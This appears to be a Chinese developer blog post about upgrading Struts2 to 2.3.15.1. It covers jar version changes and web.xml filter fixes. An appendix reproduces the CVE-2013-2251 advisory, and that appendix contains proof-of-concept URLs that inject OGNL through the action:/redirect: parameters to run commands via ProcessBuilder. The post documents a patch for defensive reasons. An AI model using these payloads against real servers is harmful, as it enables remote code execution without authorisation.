asm.jar ===》 asm-3.3.jar
asm-attrs.jar ===》 asm-attrs-2.2.3.jar
cglib-2.1.jar ===》 cglib-nodep-2.2.2.jar
commons-beanutils.jar ===》 commons-beanutils-1.8.0.jar
commons-fileupload-1.1.1.jar ===》 commons-fileupload-1.3.jar
commons-io-1.3.2.jar ===》 commons-io-2.0.1.jar
commons-lang.jar ===》 commons-lang-2.4.jar
commons-logging-1.0.4.jar ===》 commons-logging-1.1.3.jar
commons-logging-1.1.jar ===》
ognl-3.0.1.jar ===》 ognl-3.0.6.jar
struts2-core-2.2.3.jar ===》 struts2-core-2.3.15.1.jar
struts2-json-plugin-2.2.3.jar ===》 struts2-json-plugin-2.3.15.1.jar
wsdl4j-1.5.1.jar ===》 wsdl4j-1.6.2.jar
wsdl4j-1.6.1.jar ===》
xwork-core-2.2.3.jar ===》 xwork-core-2.3.15.1.jar
新引入包 ===》 asm-commons-3.3.jar
新引入包 ===》 c3p0-0.9.1.2.jar
新引入包 ===》 commons-lang3-3.1.jar
新引入包 ===》 jms-1.1.jar
新引入包 ===》 struts2-convention-plugin-2.3.15.1.jar
新引入包 ===》 struts2-spring-plugin-2.3.15.1.jar
2.相关错误信息提示及修复
2.0设置devMode为false
2.1ActionContextCleanUp <<< is deprecated! Please use the new filters警告
***************************************************************************
* WARNING!!! * >>> ActionContextCleanUp <<< is deprecated! Please use the new filters! * This can be a source of unpredictable problems! * Please refer to the docs for more details! * http://struts.apache.org/2.x/docs/webxml.html **************************************************************************
修改web.Xml中*.FilterDispatcher为*.ng.filter.StrutsPrepareAndExecuteFilterFilterDispatcher是struts2.0.x到2.1.2版本的核心过滤器. StrutsPrepareAndExecuteFilter是自2.1.3开始就替代了FilterDispatcher的. StrutsPrepareAndExecuteFilter是StrutsPrepareFilter和StrutsExecuteFilter的组合
注释代码
<filter>
<filter-name>struts-cleanup</filter-name>
<filter-class>org.apache.struts2.dispatcher.ActionContextCleanUp</filter-class>
</filter>
<filter-mapping>
<filter-name>struts-cleanup</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>
<filter>
<filter-name>struts2</filter-name>
<filter-class>org.apache.struts2.dispatcher.FilterDispatcher</filter-class>
<!--<init-param>
<param-name>actionPackages</param-name>
<param-value>cn.xkshow.demo.action</param-value>
</init-param>-->
</filter>
<filter-mapping>
<filter-name>struts2</filter-name>
<url-pattern>*.shtml</url-pattern>
<!--<dispatcher>FORWARD</dispatcher>
<dispatcher>REQUEST</dispatcher> -->
</filter-mapping><filter>
<filter-name>struts2</filter-name>
<filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</filter-class>
<!-- <init-param></init-param> -->
</filter>
<filter-mapping>
<filter-name>struts2</filter-name>
<url-pattern>*.shtml</url-pattern>
</filter-mapping>
附录:Struts2再爆远程代码执行漏洞
Struts又爆远程代码执行漏洞!在这次的漏洞中,攻击者可以通过操纵参数远程执行恶意代码。Struts 2.3.15.1之前的版本,参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行。
描述
影响版本 Struts 2.0.0 - Struts 2.3.15
报告者 Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
CVE编号 CVE-2013-2251漏洞证明
参数会以OGNL表达式执行
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}代码执行
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
漏洞原理
The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with “action:” or “redirect:”, followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.
In Struts 2 before 2.3.15.1 the information following “action:”, “redirect:” or “redirectAction:” is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
扫一扫
2082
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
